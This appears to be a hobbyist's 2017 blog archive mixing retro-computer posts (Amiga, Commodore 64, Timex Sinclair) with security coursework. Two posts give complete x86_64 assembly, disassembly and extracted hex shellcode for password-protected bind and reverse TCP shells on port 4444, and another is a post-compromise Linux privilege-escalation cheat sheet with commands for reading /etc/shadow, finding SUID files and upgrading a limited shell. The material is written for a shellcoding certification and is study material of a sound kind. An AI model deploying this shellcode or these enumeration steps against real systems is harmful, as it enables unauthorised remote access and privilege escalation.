Monday, May 15, 2017

Commodore Amiga Haul

So being a massive dork that I am, I couldn't turn down this Commodore Amiga lot that I came across.


Both an Amiga 1000 and a 2000HD! I'm excited about the 2000HD the most. I've wanted one for quite a while. The hard drive works great too. The lot also came with a TON of software. Mostly games and some video software. It came with several versions of Workbench and Kick Start. There is a lot of documentation too, which is handy when you can't find an answer online.

One of the first things I need to do is remove the battery that's next to the CPU on the main board, if it hasn't already been taken off. The batteries that were installed on these are dubbed "Board Killers", since they leak and cause all sorts of corrosion and ruin the components surrounding it.

Both machines work great as-is and I'll be doing some cleaning and preventative maintenance pretty soon, so I will probably post pictures if I find anything interesting.

Monday, May 8, 2017

My Commodore 64 Setup


Here is my Commodore 64 setup, with guest appearance from my Timex Sinclair 1000! I just recently bought the 1701 monitor from a guy in San Jose. Got it for a pretty decent price, considering it came with the box. For some reason I don't have a video cable for hooking up to the chroma input. Somehow I managed to only have composite/AV cables? The two 1541s both work great as well.

I plan on programming a C64 game eventually. It will probably be a Blade Runner-esque adventure game. I picked up a big stack of C64 programming books at a place called Urban Ore in Berkeley CA (I suggest making a trip there if you're in the area) recently, and I have been wanting to start a project.

Sunday, May 7, 2017

Linux x86_64 Bind Shell w/ password

Here is the second assignment for the x86_64 Assembly and Shellcoding Expert (SLAE64) certification. The goal of the assignment was to write a bind shell that requires a password to use. This one was a bit more difficult than the reverse shell in my opinion. The shell itself wasn't too bad, but the whole password thing took me a bit to get right. The shell kept hanging after it executed and wouldn't respond to input. Not exactly sure what was wrong, but it worked after starting from scratch a second time. I'm sure the issue was somewhere in the read() syscall.


global _start
section .text

_start:

 ; sock = socket(AF_INET, SOCK_STREAM, 0)
 ; AF_INET = 2
 ; SOCK_STREAM = 1
 ; syscall number 41 

 xor rax, rax
 mov al, 41
 xor rdi, rdi 
 mov dil, 2
 xor rsi, rsi 
 mov sil, 1
 xor rdx, rdx 
 syscall

 ; copy socket descriptor to rdi for future use 

 mov rdi, rax


 ; server.sin_family = AF_INET 
 ; server.sin_port = htons(PORT)
 ; server.sin_addr.s_addr = INADDR_ANY
 ; bzero(&server.sin_zero, 8)

 xor rax, rax 
 push rax
 mov dword [rsp-4], eax
 mov word [rsp-6], 0x5c11          ; port 4444
 mov byte [rsp-8], 0x2
 sub rsp, 8


 ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
 ; syscall number 49

 xor rax, rax
 mov al, 49
 
 mov rsi, rsp
 xor rdx, rdx 
 mov al, 16
 syscall


 ; listen(sock, MAX_CLIENTS)
 ; syscall number 50
 
 xor rax, rax
 mov al, 50
 xor rsi, rsi 
 mov sil, 2
 syscall


 ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
 ; syscall number 43

 
 xor rax, rax
 mov al, 43
 sub rsp, 16
 mov rsi, rsp
 push 16
 mov rdx, rsp
 syscall

 mov r9, rax                     ; store the client socket description 
 xor rax, rax                    ; close parent      
 mov al, 3
 syscall

 xchg rdi , r9
 xor rsi , rsi

 ; duplicate sockets

dup2:
 push 0x21
 pop rax
 syscall
 inc rsi
 cmp rsi , 0x2
 loopne dup2


Checkpass:
     
 xor rax , rax
 push 0x10
 pop rdx
 sub rsp , 16                 ; 16 bytes to receive user input 
 mov rsi , rsp
 xor edi , edi
 syscall                      ; read()
 mov rax , 0x64726f7773736150 ; "Password"
 lea rdi , [rel rsi]
 scasq
 jz Shell
 push 0x3c
 pop rax
 syscall
 
Shell:

 xor rax, rax                   ; First NULL push
 push rax
 mov rbx, 0x68732f2f6e69622f    ; push /bin//sh in reverse
 push rbx
 mov rdi, rsp                   ; store /bin//sh address in RDI
 push rax                       ; Second NULL push
 mov rdx, rsp                   ; set RDX
 push rdi                       ; Push address of /bin//sh
 mov rsi, rsp                   ; set RSI 

 
 ; Call the Execve syscall

 add rax, 59
 syscall

 

Compile it with nasm

nasm -f elf64 MyBindShell.nasm -o bindshell.o

Looking for nulls in objdump

objdump -d bindshell.o -M intel

bindshell.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:    48 31 c0                 xor    rax,rax
   3:    b0 29                    mov    al,0x29
   5:    48 31 ff                 xor    rdi,rdi
   8:    40 b7 02                 mov    dil,0x2
   b:    48 31 f6                 xor    rsi,rsi
   e:    40 b6 01                 mov    sil,0x1
  11:    48 31 d2                 xor    rdx,rdx
  14:    0f 05                    syscall
  16:    48 89 c7                 mov    rdi,rax
  19:    48 31 c0                 xor    rax,rax
  1c:    50                       push   rax
  1d:    89 44 24 fc              mov    DWORD PTR [rsp-0x4],eax
  21:    66 c7 44 24 fa 11 5c     mov    WORD PTR [rsp-0x6],0x5c11
  28:    c6 44 24 f8 02           mov    BYTE PTR [rsp-0x8],0x2
  2d:    48 83 ec 08              sub    rsp,0x8
  31:    48 31 c0                 xor    rax,rax
  34:    b0 31                    mov    al,0x31
  36:    48 89 e6                 mov    rsi,rsp
  39:    48 31 d2                 xor    rdx,rdx
  3c:    b0 10                    mov    al,0x10
  3e:    0f 05                    syscall
  40:    48 31 c0                 xor    rax,rax
  43:    b0 32                    mov    al,0x32
  45:    48 31 f6                 xor    rsi,rsi
  48:    40 b6 02                 mov    sil,0x2
  4b:    0f 05                    syscall
  4d:    48 31 c0                 xor    rax,rax
  50:    b0 2b                    mov    al,0x2b
  52:    48 83 ec 10              sub    rsp,0x10
  56:    48 89 e6                 mov    rsi,rsp
  59:    6a 10                    push   0x10
  5b:    48 89 e2                 mov    rdx,rsp
  5e:    0f 05                    syscall
  60:    49 89 c1                 mov    r9,rax
  63:    48 31 c0                 xor    rax,rax
  66:    b0 03                    mov    al,0x3
  68:    0f 05                    syscall
  6a:    49 87 f9                 xchg   r9,rdi
  6d:    48 31 f6                 xor    rsi,rsi

0000000000000070 <dup2>:
  70:    6a 21                    push   0x21
  72:    58                       pop    rax
  73:    0f 05                    syscall
  75:    48 ff c6                 inc    rsi
  78:    48 83 fe 02              cmp    rsi,0x2
  7c:    e0 f2                    loopne 70 <dup2>

000000000000007e <Checkpass>:
  7e:    48 31 c0                 xor    rax,rax
  81:    6a 10                    push   0x10
  83:    5a                       pop    rdx
  84:    48 83 ec 10              sub    rsp,0x10
  88:    48 89 e6                 mov    rsi,rsp
  8b:    31 ff                    xor    edi,edi
  8d:    0f 05                    syscall
  8f:    48 b8 50 61 73 73 77     movabs rax,0x64726f7773736150
  96:    6f 72 64
  99:    48 8d 3e                 lea    rdi,[rsi]
  9c:    48 af                    scas   rax,QWORD PTR es:[rdi]
  9e:    74 05                    je     a5 <Shell>
  a0:    6a 3c                    push   0x3c
  a2:    58                       pop    rax
  a3:    0f 05                    syscall

00000000000000a5 <Shell>:
  a5:    48 31 c0                 xor    rax,rax
  a8:    50                       push   rax
  a9:    48 bb 2f 62 69 6e 2f     movabs rbx,0x68732f2f6e69622f
  b0:    2f 73 68
  b3:    53                       push   rbx
  b4:    48 89 e7                 mov    rdi,rsp
  b7:    50                       push   rax
  b8:    48 89 e2                 mov    rdx,rsp
  bb:    57                       push   rdi
  bc:    48 89 e6                 mov    rsi,rsp
  bf:    48 83 c0 3b              add    rax,0x3b
  c3:    0f 05                    syscall

00000000000000c5 <Exit>:
  c5:    6a 3c                    push   0x3c
  c7:    58                       pop    rax
  c8:    48 31 ff                 xor    rdi,rdi
  cb:    0f 05                    syscall

No nulls! Time to pull the hex out of the objdump output.


for i in $(objdump -d bindshell.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo

\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\xb0\x10\x0f\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x40\xb6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x31\xc0\xb0\x03\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xc0\x6a\x10\x5a\x48\x83\xec\x10\x48\x89\xe6\x31\xff\x0f\x05\x48\xb8\x50\x61\x73\x73\x77\x6f\x72\x64\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05


Saturday, May 6, 2017

Linux x86_64 Reverse Shell w/ password

So this is my first assignment for the x86_64 Assembly and Shellcoding Expert (SLAE64) certification requirements. The assignment was to create shellcode that will spawn a reverse TCP shell that requires a password. 


global _start


_start:

 ; sock = socket(AF_INET, SOCK_STREAM, 0)
 ; AF_INET = 2
 ; SOCK_STREAM = 1
 ; syscall number 41 

 xor rax, rax
 mov al, 41
 xor rdi, rdi 
 mov dil, 2
 xor rsi, rsi 
 mov sil, 1
 xor rdx, rdx 
 syscall

 ; copy socket descriptor to rdi for future use 

 mov rdi, rax


 ; server.sin_family = AF_INET 
 ; server.sin_port = htons(PORT)
 ; server.sin_addr.s_addr = inet_addr("127.0.0.1")
 ; bzero(&server.sin_zero, 8)

 xor rax, rax 
 push rax
 mov dword [rsp-4], 0x0100007f ; IP address 127.0.0.1
 mov word [rsp-6], 0x5c11 ; port 4444
 mov byte [rsp-8], 0x2
 sub rsp, 8


 ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
 
 xor rax, rax 
 mov al, 42
 mov rsi, rsp
 xor rdx, rdx 
 mov dl, 16
 syscall


        ; duplicate sockets

        ; dup2 (new, old)
        
 xor rax, rax
 mov al, 33
 xor rsi, rsi
 syscall

 xor rax, rax        
 mov al, 33
 xor rsi, rsi        
 mov sil, 1
 syscall

 xor rax, rax
 mov al, 33
 xor rsi, rsi
 mov sil, 2
 syscall


 password_check:
     
 push rsp
 pop rsi
 xor rax, rax      ; system read syscall value is 0 so rax is set to 0
 syscall
 push 0x73736170  ;password 'pass'
 pop rax
 lea rdi, [rel rsi]
 scasd             ; comparing the user input and stored password in the stack
 jne Exit      

 ; execve

 ; First NULL push

 xor rax, rax
 push rax
 mov rbx, 0x68732f2f6e69622f     ; push /bin//sh in reverse
 push rbx
 mov rdi, rsp     ; store /bin//sh address in RDI
 push rax    ; Second NULL push
 mov rdx, rsp   ; set RDX
 push rdi   ; Push address of /bin//sh
 mov rsi, rsp   ; set RSI

        ; Call the Execve syscall
 add rax, 59
 syscall

 Exit:
  ;Exit shellcode if password is wrong
  
 push 0x3c
 pop rax           ;syscall number for exit is 60
 xor rdi, rdi
 syscall
 

So now that I have the my shell written, I need to compile it.

nasm -f elf64 RevShellpass.nasm -o Revshellpass.o

Now to run objdump to see if there are any nulls.

objdump -d RevShellpass.o -M intel

The output shows there are no nulls, save the nulls inherent in the IP address 127.0.0.1 that I used for testing purposes. (highlighted in yellow)

RevShellpass.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
   0:    48 31 c0                 xor    rax,rax
   3:    b0 29                    mov    al,0x29
   5:    48 31 ff                 xor    rdi,rdi
   8:    40 b7 02                 mov    dil,0x2
   b:    48 31 f6                 xor    rsi,rsi
   e:    40 b6 01                 mov    sil,0x1
  11:    48 31 d2                 xor    rdx,rdx
  14:    0f 05                    syscall
  16:    48 89 c7                 mov    rdi,rax
  19:    48 31 c0                 xor    rax,rax
  1c:    50                       push   rax
  1d:    c7 44 24 fc 7f 00 00     mov    DWORD PTR [rsp-0x4],0x100007f
  24:    01
  25:    66 c7 44 24 fa 11 5c     mov    WORD PTR [rsp-0x6],0x5c11
  2c:    c6 44 24 f8 02           mov    BYTE PTR [rsp-0x8],0x2
  31:    48 83 ec 08              sub    rsp,0x8
  35:    48 31 c0                 xor    rax,rax
  38:    b0 2a                    mov    al,0x2a
  3a:    48 89 e6                 mov    rsi,rsp
  3d:    48 31 d2                 xor    rdx,rdx
  40:    b2 10                    mov    dl,0x10
  42:    0f 05                    syscall
  44:    48 31 c0                 xor    rax,rax
  47:    b0 21                    mov    al,0x21
  49:    48 31 f6                 xor    rsi,rsi
  4c:    0f 05                    syscall
  4e:    48 31 c0                 xor    rax,rax
  51:    b0 21                    mov    al,0x21
  53:    48 31 f6                 xor    rsi,rsi
  56:    40 b6 01                 mov    sil,0x1
  59:    0f 05                    syscall
  5b:    48 31 c0                 xor    rax,rax
  5e:    b0 21                    mov    al,0x21
  60:    48 31 f6                 xor    rsi,rsi
  63:    40 b6 02                 mov    sil,0x2
  66:    0f 05                    syscall

0000000000000068 <password_check>:
  68:    54                       push   rsp
  69:    5e                       pop    rsi
  6a:    48 31 c0                 xor    rax,rax
  6d:    0f 05                    syscall
  6f:    68 70 61 73 73           push   0x73736170
  74:    58                       pop    rax
  75:    48 8d 3e                 lea    rdi,[rsi]
  78:    af                       scas   eax,DWORD PTR es:[rdi]
  79:    75 20                    jne    9b <Exit>
  7b:    48 31 c0                 xor    rax,rax
  7e:    50                       push   rax
  7f:    48 bb 2f 62 69 6e 2f     movabs rbx,0x68732f2f6e69622f
  86:    2f 73 68
  89:    53                       push   rbx
  8a:    48 89 e7                 mov    rdi,rsp
  8d:    50                       push   rax
  8e:    48 89 e2                 mov    rdx,rsp
  91:    57                       push   rdi
  92:    48 89 e6                 mov    rsi,rsp
  95:    48 83 c0 3b              add    rax,0x3b
  99:    0f 05                    syscall

000000000000009b <Exit>:
  9b:    6a 3c                    push   0x3c
  9d:    58                       pop    rax
  9e:    48 31 ff                 xor    rdi,rdi
  a1:    0f 05                    syscall

Now that there are no nulls in the shellcode, time to pull the hex out of the objdump output.

for i in $(objdump -d RevShellpass.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo

\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\x7f\x00\x00\x01\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x2a\x48\x89\xe6\x48\x31\xd2\xb2\x10\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x40\xb6\x01\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x40\xb6\x02\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05\x68\x70\x61\x73\x73\x58\x48\x8d\x3e\xaf\x75\x20\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05

Linking it with ld to test it as a standalone binary

ld RevShellpass.o -o RevShellpass

Wednesday, May 3, 2017

Thrift Store Score: 1982 Timex Sinclair 1000


Found this at a local thrift store yesterday. A Timex Sinclair 1000 accompanied by the 1016 RAM (16k) module. This was the American release of the Sinclair ZX81. Its selling point was being the first home computer to sell for under $100.

I don't know if it this one works or not because it didn't come with a power supply. I suppose I will look around for one. I should be able to hook this up to one of my older TVs if I get it up and running. Apparently you have to mod them if you you want to use one on a modern TV. I would rather keep it original though.

As for the internals, everything seems to be okay from a superficial standpoint. No bad caps or any burned smell. I'm going to check it out a bit more in depth when I get a chance. The RAM module seems okay too. I suppose I'll find out what works and what doesn't whenever I find a power supply.

Monday, May 1, 2017

Taking Securitytube's Linux x86/64 Assembly and Shellcoding Course

So I started the SLAE64 course a few weeks back. So far I'm enjoying it. Vivek explains everything fairly well. The price wasn't that bad either. It only costs $149 (USD)

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

I have some experience with x86 assembly, so I was able to pick up most of it right off the bat. It covers the basics of x86_64 assembly in Linux, which I might add that there are not a ton of resources out there for 64-bit assembly for whatever reason. Realistically, the resources are not impossible to find, just more sparse than 32-bit. The differences between the two are not that great, but having a little clarification on the addition of the R(n) registers and address sizes is nice to have.

Anyways, about the course content. There are a good amount of videos that go over the basic x86 assembly instructions like mov, pop, lea etc. The later videos in the 2nd half cover topics that pertain to shellcoding specifically, like removing nulls and implementing crypters. Even though some of the basics are covered, I would recommend at least having basic x86 assembly knowledge. There are some gaps that will need further explanation if you don't have prior knowledge.

The test is a series of seven assignments that you must complete and post on a public blog. I haven't completed them yet and will be posting them here at some point.

All in all I am enjoying the course, I mean its only $149 and you get a certificate when you complete it. If you are looking to get into shellcoding I would give this course some consideration.

Enumerating for Privilege Escalation: Linux

So, you have a shell on a Linux machine. But what now? Privilege Escalation! (Unless you spawned a root shell of course! Then its time for some lateral movement I suppose). But before you can escalate your privileges, you will have to figure out how you are going to do it. So that brings us to enumeration, which is hands down the most important part of compromising a target.

So this post is not intended to be a definitive guide to Linux priv-esc or anything, but merely a simple collection of things that I have personally found helpful during enumeration. I am totally open to suggestions or any ideas. This post is also heavily inspired by g0tmi1k's amazing post, Basic Linux Privilege Escalation:


I recommend bookmarking that ^


Get Your Bearings

First things first. Always get a good feel for the machine. Its always a good idea to figure out what version you're looking at:


cat /etc/issue
or

cat /etc/*-release

What is the kernel version? Are there known exploits for that version?


cat /proc/version
uname -a
rpm -q kernel

Where are you on the network? What connections are established? 


ifconfig -a
netstat -antup
iptables -L
arp -e


What is running?

There are numerous local privilege escalation exploits out there in the void. Are there any vulnerable applications or services running that have known exploits?

Which services are being run with root privileges?


ps -ef | grep root
or 

ps aux | grep root 


cat /etc/services

Any vulnerable applications?


ls -alh /usr/bin/
ls -alh /sbin/


Any files with SUID/SGID permissions?


find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
or, for a faster search in "bin" directories
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done


Uploading and running exploit code

If there is a local privilege escalation exploit available, how will you upload and execute the exploit code on your target? 

What languages are supported on the machine?


find / -name <language>*
ex: find / -name python*

Is GCC present?


find / -name gcc


How can you upload the exploit code? Use find to look for things like:

wget, nc, netcat, tftp, ftp, fetch etc.

Where can you write and execute files?

You will need to find a place to compile and execute your exploit code

This will locate world writeable and world executable folders


find / \(-perm -o w -perm -o x\) -type d 2>/dev/null 

Cracking passwords

Can you view /etc/passwd and /etc/shadow ?


cat /etc/passwd
cat /etc/shadow

If you can, try to crack the hashes you find. You never know!

Limited Shell?

Give these a shot.


python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')


The simplest things are often overlooked

If I am ever stuck getting root privileges, its 9 times out of 10 because I am overthinking it. Sometimes the answer is so simple that its easy to overlook it. If you're getting stuck, think back to square one and move forward slowly and pay attention to the details. Here are some of simple things that can be overlooked:

Is the account you are using a sudoer? If you have the password for the account, you may be able to use sudo. I have seen many people look over this. Are there other users that are sudoers?


cat /etc/sudoers
sudo -l

Always check for password reuse. Unless of course you don't want to be noisy and risk a failed authentication.

Sometimes people don't think straight and put plain text passwords in .txt files and spreadsheets and all kinds of terribly insecure places, so don't disregard the idea. 

Enumeration scripts

To make life easier, you can write your own bash script to run whatever commands you want, although sometimes it is not plausible to do so. For example if you do not have the privilege to upload files or execute shell scripts. 

Anyways, those are my usual go-to commands when I start enumerating for priv-esc. It is not an exhaustive list by any means, there is a whole world of possibilities out there for getting root and hopefully this will help! I'm sure I will add things as I think of them, seeing as I wrote this on my lunch at work and probably forgot a bunch of stuff. Happy Hunting.




Thank you to g0tmi1k for your awesome post on the subject. I have used it more than any other blog I can think of!